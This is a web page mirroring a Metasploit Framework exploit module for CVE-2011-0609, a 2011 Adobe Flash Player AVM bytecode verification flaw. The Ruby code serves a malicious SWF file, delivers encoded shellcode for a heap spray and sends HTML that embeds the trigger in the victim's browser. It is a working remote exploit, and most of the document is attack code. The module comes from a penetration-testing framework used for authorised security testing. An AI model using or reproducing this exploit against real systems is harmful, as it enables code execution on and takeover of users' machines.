Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/browser/adobe_flashplayer_avm.rb
19934 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GoodRanking

8


9
  include Msf::Exploit::Remote::HttpServer::HTML

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'Adobe Flash Player AVM Bytecode Verification Vulnerability',

16
        'Description' => %q{

17
          This module exploits a vulnerability in Adobe Flash Player versions 10.2.152.33

18
          and earlier. This issue is caused by a failure in the ActionScript3 AVM2 verification

19
          logic. This results in unsafe JIT(Just-In-Time) code being executed.  This is the same

20
          vulnerability that was used for the RSA attack in March 2011.

21


22
          Specifically, this issue results in uninitialized memory being referenced and later

23
          executed. Taking advantage of this issue relies on heap spraying and controlling the

24
          uninitialized memory.

25


26
          Currently this exploit works for IE6, IE7, and Firefox 3.6 and likely several

27
          other browsers. DEP does catch the exploit and causes it to fail. Due to the nature

28
          of the uninitialized memory its fairly difficult to get around this restriction.

29
        },

30
        'License' => MSF_LICENSE,

31
        'Author' => [

32
          'bannedit', # Metasploit version,

33
          'Unknown' # Malcode version seen used in targeted attacks

34
        ],

35
        'References' => [

36
          ['CVE', '2011-0609'],

37
          ['OSVDB', '71254'],

38
          ['URL', 'http://bugix-security.blogspot.com/2011/03/cve-2011-0609-adobe-flash-player.html'],

39
          ['URL', 'http://www.adobe.com/devnet/swf.html'],

40
          ['URL', 'http://www.adobe.com/support/security/advisories/apsa11-01.html'],

41
          ['URL', 'http://www.f-secure.com/weblog/archives/00002226.html'],

42
        ],

43
        'DefaultOptions' => {

44
          'EXITFUNC' => 'process',

45
          'HTTP::compression' => 'gzip',

46
          'HTTP::chunked' => true,

47
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'

48
        },

49
        'Payload' => {

50
          'Space' => 1000,

51
          'BadChars' => "\x00",

52
          'DisableNops' => true

53
        },

54
        'Platform' => 'win',

55
        'Targets' => [

56
          [ 'Automatic', {}],

57
        ],

58
        'DisclosureDate' => '2011-03-15',

59
        'DefaultTarget' => 0,

60
        'Notes' => {

61
          'Reliability' => UNKNOWN_RELIABILITY,

62
          'Stability' => UNKNOWN_STABILITY,

63
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

64
        }

65
      )

66
    )

67
  end

68


69
  def exploit

70
    path = File.join(Msf::Config.data_directory, "exploits", "CVE-2011-0609.swf")

71
    fd = File.open(path, "rb")

72
    @swf = fd.read(fd.stat.size)

73
    fd.close

74


75
    super

76
  end

77


78
  def on_request_uri(cli, request)

79
    trigger = @swf

80
    trigger_file = rand_text_alpha(rand(6) + 3) + ".swf"

81
    shellcode = payload.encoded.unpack('H*')[0]

82
    obj_id = rand_text_alpha(rand(6) + 3)

83


84
    if request.uri.match(/\.swf/i)

85
      print_status("Sending Exploit SWF")

86
      send_response(cli, trigger, { 'Content-Type' => 'application/x-shockwave-flash' })

87
      return

88
    end

89


90
    # we use a nice trick by having Flash request our shellcode and load it for the heap spray

91
    # src for the flash file: external/source/exploits/CVE-2011-0609/exploit.as

92
    if request.uri.match(/\.txt/i)

93
      send_response(cli, shellcode, { 'Content-Type' => 'text/plain' })

94
      return

95
    end

96


97
    html = <<-EOS

98
    <html>

99
      <head>

100
      </head>

101
      <body>

102
    <center>

103
      <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"

104
                 id="#{obj_id}" width="600" height="400"

105
                 codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab">

106
             <param name="movie" value="#{get_resource}#{trigger_file}" />

107
             <embed src="#{get_resource}#{trigger_file}" quality="high"

108
                 width="320" height="300" name="#{obj_id}" align="middle"

109
                 allowNetworking="all"

110
                 type="application/x-shockwave-flash"

111
                 pluginspage="http://www.macromedia.com/go/getflashplayer">

112
             </embed>

113


114
         </object>

115
    </center>

116


117
    </body>

118
    </html>

119
    EOS

120


121
    print_status("Sending #{self.name} HTML")

122
    send_response(cli, html, { 'Content-Type' => 'text/html' })

123
  end

124
end

125


126